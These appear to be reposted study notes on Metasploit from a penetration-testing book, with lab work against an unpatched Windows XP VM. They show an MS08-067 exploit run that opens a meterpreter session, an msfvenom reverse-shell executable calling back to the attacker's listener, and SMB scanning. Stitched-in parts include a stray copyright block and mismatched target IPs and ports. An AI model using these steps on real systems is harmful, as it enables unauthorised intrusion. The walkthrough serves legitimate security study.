[4] Metasploit penetration-testing tool
About: reading notes
❤️ Book: Penetration Testing: A Hands-On Introduction to Hacking (Chinese edition title: 渗透测试 完全初学者指南)
Tools:
- Kali Linux (with Metasploit)
- Windows XP SP2 (no security patches installed)
1. Starting Metasploit
<1>. Start Metasploit
┌──(root💀kali)-[/home/kali]
└─# service postgresql start
┌──(root💀kali)-[/home/kali]
└─# msfconsole
<2>.help
msf6 > help route
Route traffic destined to a given subnet through a supplied session.
Usage:
route [add/remove] subnet netmask [comm/sid]
route [add/remove] cidr [comm/sid]
route [get] <host or network>
route [flush]
route [print]
Subcommands:
add - make a new route
remove - delete a route; 'del' is an alias
flush - remove all routes
get - display the route for a given target
print - show all active routes
Examples:
Add a route for all hosts from 192.168.0.0 to 192.168.0.255 through session 1
route add 192.168.0.0 255.255.255.0 1
route add 192.168.0.0/24 1
Delete the above route
route remove 192.168.0.0/24 1
route del 192.168.0.0 255.255.255.0 1
Display the route that would be used for the given host or network
route get 192.168.0.11
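To make the help text above concrete, here is an added example (not Metasploit's own code) that models the `route` table: it accepts both the `subnet netmask sid` and `cidr sid` forms, treats them as the same route, and answers `route get` with a longest-prefix match, which is the behaviour a pivot table needs when a /25 and a /24 overlap. Session ids are plain integers here rather than live sessions.

```python
# Added example (not Metasploit's own code): a small model of the msfconsole
# `route` table. Sessions are plain integers; real routes point at live
# Meterpreter sessions. Lookup uses longest-prefix match (most specific wins).
import ipaddress


class RouteTable:
    def __init__(self):
        # Each entry is (IPv4Network, session id), kept in insertion order.
        self.routes = []

    @staticmethod
    def _network(subnet, netmask=None):
        # "192.168.0.0/24" and ("192.168.0.0", "255.255.255.0") are the same block;
        # ipaddress accepts both "addr/prefix" and "addr/dotted-mask".
        spec = subnet if netmask is None else f"{subnet}/{netmask}"
        return ipaddress.ip_network(spec, strict=False)

    def execute(self, line):
        """Run one `route ...` command string and return its result."""
        parts = line.split()
        if parts and parts[0] == "route":
            parts = parts[1:]
        if not parts:
            raise ValueError("missing subcommand")
        verb, args = parts[0], parts[1:]

        if verb in ("add", "remove", "del"):
            if len(args) == 3:      # subnet netmask sid
                net, sid = self._network(args[0], args[1]), int(args[2])
            elif len(args) == 2:    # cidr sid
                net, sid = self._network(args[0]), int(args[1])
            else:
                raise ValueError(f"route {verb}: expected 'subnet netmask sid' or 'cidr sid'")
            entry = (net, sid)
            if verb == "add":
                if entry not in self.routes:    # adding the same route twice is a no-op
                    self.routes.append(entry)
                return True
            if entry in self.routes:
                self.routes.remove(entry)
                return True
            return False

        if verb == "get":
            if len(args) != 1:
                raise ValueError("route get: expected one host or network")
            return self.lookup(args[0])
        if verb == "flush":
            self.routes.clear()
            return True
        if verb == "print":
            return [(str(net), sid) for net, sid in self.routes]
        raise ValueError(f"unknown subcommand {verb!r}")

    def lookup(self, target):
        """Return (network, session) of the most specific route containing target, or None."""
        want = ipaddress.ip_network(target, strict=False)   # a bare host becomes a /32
        best = None
        for net, sid in self.routes:
            if want.subnet_of(net) and (best is None or net.prefixlen > best[0].prefixlen):
                best = (net, sid)
        return None if best is None else (str(best[0]), best[1])


if __name__ == "__main__":
    table = RouteTable()
    for cmd in ("route add 192.168.0.0 255.255.255.0 1",
                "route add 192.168.0.128/25 2",
                "route get 192.168.0.11",
                "route get 192.168.0.200",
                "route print"):
        print(f"{cmd:45} -> {table.execute(cmd)}")
```

Feeding the exact example lines from the help text shows that the netmask and CIDR forms collapse to one entry, and that `route get` prefers the /25 for hosts inside it even though the /24 also matches.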
<3>. Finding Metasploit modules
- the online Metasploit module database
- the built-in search command
msf6 > search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
- verify the match with the info command
msf6 > info exploit/windows/smb/ms08_067_netapi
Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2008-10-28
Provided by:
hdm <x@hdm.io>
Brett Moore <brett.moore@insomniasec.com>
frank2 <frank2@dc949.org>
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
6 Windows XP SP3 English (AlwaysOn NX)
......
70 Windows 2003 SP2 Japanese (NO NX)
71 Windows 2003 SP2 French (NO NX)
72 Windows 2003 SP2 French (NX)
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 408
Avoid: 8 characters
Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.
References:
https://cvedetails.com/cve/CVE-2008-4250/
OSVDB (49243)
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos
2. Basic usage
<1>. Select the exploit module
msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) >
<2>. Set the module options
[1]. Show the options that need to be set
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.129 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
[2]. Options to set
RHOST: target host IP (msf6 accepts RHOST as an alias for the RHOSTS option shown above)
RPORT: target host port
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.159.131
RHOST => 192.168.159.131
[3]. Exploit target
msf6 exploit(windows/smb/ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
6 Windows XP SP3 English (AlwaysOn NX)
7 Windows XP SP3 English (NX)
8 Windows XP SP2 Arabic (NX)
9 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
......
71 Windows 2003 SP2 French (NO NX)
72 Windows 2003 SP2 French (NX)
<3>. Payloads
[1]. List the compatible payloads
msf6 exploit(windows/smb/ms08_067_netapi) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 generic/custom normal No Custom Payload
1 generic/debug_trap normal No Generic x86 Debug Trap
2 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
......
146 windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
[2]. Run
┌──(root💀kali)-[/home/kali]
└─# nmap 192.168.159.131
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-25 10:39 EDT
Nmap scan report for 192.168.159.131
Host is up (0.0013s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
MAC Address: 00:0C:29:F8:26:9E (VMware)
It can be seen that port 445 on the target host is open. If it is not, open the registry on the target host by typing regedit at the command line, navigate under HKEY_LOCAL_MACHINE to System\CurrentControlSet\Services\NetBT\Parameters, and set the value of SMBDeviceEnabled to 1.
————————————————
Copyright notice: the paragraph above is an original article by CSDN blogger "Zoran_db", licensed under CC 4.0 BY-SA; when reproducing it, include the original source link and this notice.
Original link: https://blog.csdn.net/m0_53979135/article/details/112919281
msf6 exploit(windows/smb/ms08_067_netapi) > set RPORT 139
RPORT => 139
[*] 192.168.159.132 - Meterpreter session 1 closed. Reason: User exit
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.159.129:4444
[*] 192.168.159.132:445 - Automatically detecting the target...
[*] 192.168.159.132:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.159.132:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.159.132:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.159.132
[*] Meterpreter session 2 opened (192.168.159.129:4444 -> 192.168.159.132:1037) at 2021-03-28 09:10:35 -0400
meterpreter > pwd
C:\WINDOWS\system32
meterpreter >
3. Kinds of shell
<1>. Setting the payload manually
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
4. Creating a payload with msfvenom (key point)
1. Choose a payload
msfvenom -l payload
2. Check and set the relevant options
msfvenom -p windows/meterpreter/reverse_tcp -o
(In the msfvenom version used by the book, -o listed the payload's options; in current msfvenom -o is short for --out, the output file, and the option listing is --list-options.)
3. Choose the output format
┌──(root💀kali)-[/home/kali/mydirectory/msfvenim]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.129 LPORT=4444 -f exe > chapter4example.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
4. Deploy the executable
There are several ways, for example hosting it on a server for others to download. Here I simply drag and drop it into the target VM. At this point the target has not yet connected back.
5. Connect to the target with the multi/handler module
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show
[-] Argument required
[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options
[*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 192.168.159.129
LHOST => 192.168.159.129
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.159.129:4444
Now run the exe on the target, and it connects back successfully!!!
[*] Sending stage (175174 bytes) to 192.168.159.132
[*] Meterpreter session 3 opened (192.168.159.129:4444 -> 192.168.159.132:1055) at 2021-03-28 09:38:45 -0400
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
5. Using auxiliary modules
- Modules that do not require a payload are not modules that exploit a vulnerability directly; they are auxiliary modules, and they can operate on many hosts at once (unlike exploit modules, which work against a single host).
msf6 exploit(multi/handler) > use scanner/smb/pipe_auditor
msf6 auxiliary(scanner/smb/pipe_auditor) >
msf6 auxiliary(scanner/smb/pipe_auditor) > show options
Module options (auxiliary/scanner/smb/pipe_auditor):
Name Current Setting Required Description
---- --------------- -------- -----------
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
- Run it
msf6 auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 192.168.159.132
RHOSTS => 192.168.159.132
msf6 auxiliary(scanner/smb/pipe_auditor) > run
[+] 192.168.159.132:139 - Pipes: \browser
[*] 192.168.159.132: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/pipe_auditor) >
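Because auxiliary scanners such as pipe_auditor take an RHOSTS value rather than a single host, it is worth knowing exactly which addresses a given RHOSTS string covers before running a scan across your own network. The following is an added example (not Metasploit's own code) that expands the forms named in the option table above: a single address, a CIDR block, a dash range, and `file:<path>`. Two details are assumptions rather than facts taken from the page: a CIDR block expands to every address in it (network and broadcast included), and the short range form `10.0.0.1-10` varies only the last octet.

```python
# Added example (not Metasploit's own code): a simplified expansion of the
# RHOSTS syntax "target host(s), range CIDR identifier, or hosts file with
# syntax 'file:<path>'". Assumptions: a CIDR block yields every address in it
# (network and broadcast included); "10.0.0.1-10" varies only the last octet.
import ipaddress


def _expand_item(item):
    """Expand one whitespace-free RHOSTS token into a list of address strings."""
    if "/" in item:                                          # CIDR block
        return [str(a) for a in ipaddress.ip_network(item, strict=False)]
    if "-" in item:                                          # dash range
        start, end = item.split("-", 1)
        if "." not in end:                                   # short form: "10.0.0.1-10"
            end = start.rsplit(".", 1)[0] + "." + end
        first, last = ipaddress.ip_address(start), ipaddress.ip_address(end)
        if last < first:
            raise ValueError(f"range end precedes start: {item}")
        return [str(ipaddress.ip_address(n)) for n in range(int(first), int(last) + 1)]
    return [str(ipaddress.ip_address(item))]                 # single address (validated)


def expand_rhosts(spec, read_file=None):
    """Expand an RHOSTS string into a de-duplicated, ordered list of hosts.

    read_file(path) -> str lets callers supply file contents (used by the tests
    so nothing touches disk); by default the file is read from disk. Blank
    lines and '#' comments are skipped, and each file line may itself use any
    of the forms handled by _expand_item.
    """
    if read_file is None:
        def read_file(path):
            with open(path, encoding="utf-8") as fh:
                return fh.read()

    seen, hosts = set(), []
    for item in spec.split():
        if item.startswith("file:"):
            expanded = []
            for line in read_file(item[len("file:"):]).splitlines():
                line = line.strip()
                if line and not line.startswith("#"):
                    expanded.extend(expand_rhosts(line, read_file))
        else:
            expanded = _expand_item(item)
        for host in expanded:
            if host not in seen:                             # keep first occurrence only
                seen.add(host)
                hosts.append(host)
    return hosts


if __name__ == "__main__":
    for spec in ("192.168.159.132", "10.0.0.0/30", "10.0.0.1-3", "10.0.0.254-10.0.1.1"):
        print(f"{spec:22} -> {expand_rhosts(spec)}")
```

A malformed token (a bad address or a range whose end precedes its start) raises ValueError instead of silently producing an empty list, which is the failure mode you want when the scan's target set is being reviewed.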
Other
Windows: view the IP address with ipconfig
Windows: check whether a port is open with netstat
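netstat answers two different questions on the target: which ports are listening (the exposure question behind 139/445 above) and which established connections exist (the connect-back that appears in the Meterpreter session lines as `192.168.159.129:4444 -> 192.168.159.132:1055`). The following added example (not from the book or the page) parses constructed `netstat -ano` output and separates the two. The handler port defaults to 4444 only because that is msfvenom's default LPORT, which the page itself shows is configurable, so port matching is a first triage filter, not a verdict; the PID column is what you carry into process inspection.

```python
# Added example (not from the book or the page): parse Windows `netstat -ano`
# output, list listening TCP ports, and flag established outbound connections
# to a reverse-shell handler port. SAMPLE_NETSTAT is constructed for this
# example; 203.0.113.10 is a documentation (TEST-NET-3) address.
import re

SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       900
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.159.132:139    0.0.0.0:0              LISTENING       4
  TCP    192.168.159.132:1055   192.168.159.129:4444   ESTABLISHED     1320
  TCP    192.168.159.132:1061   203.0.113.10:443       ESTABLISHED     1780
  UDP    0.0.0.0:137            *:*                                    4
"""

_ROW_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+([A-Z_]+))?\s+(\d+)\s*$")


def _split_endpoint(text):
    """'192.168.159.132:1055' -> ('192.168.159.132', 1055); '[::]:445' -> ('::', 445); '*:*' -> ('*', None)."""
    host, port = text.rsplit(":", 1)
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def parse_netstat(text):
    """Return one dict per connection row; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        match = _ROW_RE.match(line)
        if not match:
            continue
        proto, local, remote, state, pid = match.groups()
        lhost, lport = _split_endpoint(local)
        rhost, rport = _split_endpoint(remote)
        rows.append({
            "proto": proto, "local_host": lhost, "local_port": lport,
            "remote_host": rhost, "remote_port": rport,
            "state": state or "",          # UDP rows carry no state column
            "pid": int(pid),
        })
    return rows


def listening_ports(text):
    """Sorted TCP ports in LISTENING state: the exposure view (e.g. 139, 445)."""
    return sorted({r["local_port"] for r in parse_netstat(text)
                   if r["proto"] == "TCP" and r["state"] == "LISTENING"})


def suspicious_outbound(text, handler_ports=(4444,)):
    """Established TCP connections whose remote port matches a known handler port.

    Port matching is only a triage filter: LPORT is attacker-chosen, so a
    miss here proves nothing. The PID is the pivot into process inspection.
    """
    return [r for r in parse_netstat(text)
            if r["proto"] == "TCP" and r["state"] == "ESTABLISHED"
            and r["remote_port"] in handler_ports]


if __name__ == "__main__":
    print("listening:", listening_ports(SAMPLE_NETSTAT))
    for hit in suspicious_outbound(SAMPLE_NETSTAT):
        print(f"PID {hit['pid']}: {hit['local_host']}:{hit['local_port']} -> "
              f"{hit['remote_host']}:{hit['remote_port']}")
```

Run on a real host, feed it `netstat -ano` output captured to a file; the regex tolerates the header lines and the UDP rows that lack a State column, and IPv6 endpoints in `[addr]:port` form are split correctly.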
Article compiled by 极客之音; link to this article: https://www.bmabk.com/index.php/post/92696.html